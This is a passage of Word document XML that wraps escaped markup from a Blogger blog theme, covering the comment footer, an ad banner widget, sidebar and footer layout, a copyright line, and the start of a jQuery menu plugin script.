    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;p class='comment-footer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:if cond='data:post.allowNewComments'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;b:include data='post' name='threaded-comment-form'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;data:post.noNewCommentsText/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:showCmtPopup'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div id='comment-popup'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;iframe allowtransparency='true' frameborder='0' id='comment-actions' name='comment-actions' scrolling='no'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div id='backlinks-container'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div expr:id='data:widget.instanceId + &amp;quot;_backlinks-container&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;b:include cond='data:post.showBacklinks' data='post' name='backlinks'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;/b:section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;b:section class='mlsa-bottom-advert hidden' id='Advertisement-Bottom' name='Post Bottom Banner Advertisement' showaddelement='no'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;b:widget id='HTML991' locked='false' title='Advertisement 728 x 90' type='HTML' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:widget-setting name='content'&gt;&lt;![CDATA[&lt;a href="javascript:void(0);"&gt;&lt;img src="https://3.bp.blogspot.com/-prrYJPXbeFM/XYLwXpOmgjI/AAAAAAAAABQ/l8K1Nm68vnQSzd6WARUQ5uVnuIOhnjkOgCLcBGAsYHQ/s320/umah%2Bbelajar.jpg "/&gt;&lt;/a&gt;]]&gt;&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                        &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div id='melesa-btm-ad-pick'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;data:content/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;/b:section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;div class='col-md-4' id='left-sidebar-area'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;div class='column-left-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;div class='column-left-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;macro:include id='main-column-left-sections' name='sections'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;macro:param default='0' name='num' value='0'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;macro:param default='sidebar-left' name='idPrefix'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;macro:param default='sidebar' name='class'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;macro:param default='true' name='includeBottom'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;/macro:include&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;div class='col-md-4' id='right-sidebar-area'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;div class='column-right-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;div class='column-right-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;macro:include id='main-column-right-sections' name='sections'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;macro:param default='2' name='num' value='1'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;macro:param default='sidebar-right' name='idPrefix'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;macro:param default='sidebar' name='class'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;macro:param default='true' name='includeBottom'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      &lt;/macro:include&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    &lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;div class='clearcontn'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='clearinglayout' style='clear: both'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;!-- columns --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;!-- main --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;div class='main-cap-bottom cap-bottom'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;div class='wrapper fwrapper'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;div class='container'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;footer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;div class='row'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='col-sm-12'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;div class='footer-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='footer-cap-top cap-top'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='fauxborder-left footer-fauxborder-left'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;div class='fauxborder-right footer-fauxborder-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;div class='region-inner footer-inner'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;macro:include id='footer-sections' name='sections'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;macro:param default='2' name='num' value='3'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;macro:param default='footer' name='idPrefix'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                &lt;macro:param default='foot' name='class'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                &lt;macro:param default='false' name='includeBottom'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;/macro:include&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              &lt;!-- outside of the include in order to lock Attribution widget --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;div class='footer-cap-bottom cap-bottom'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;/div&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;div class='row' id='creditlink'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;div class='col-sm-12 text-center' id='credit-blsm'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        (C) Copyright 2017, &lt;a expr:href='data:blog.homepageUrl'&gt;&lt;data:blog.title/&gt;&lt;/a&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;/footer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;!-- content --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;div class='content-cap-bottom cap-bottom'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='cap-left'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;div class='cap-right'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;div class='clear-body'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;script type='text/javascript'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      //&lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      /*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve"> * jQuery Superfish Menu Plugin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve"> * Copyright (c) 2013 Joel Birch</w:t>
      </w:r>
    </w:p>
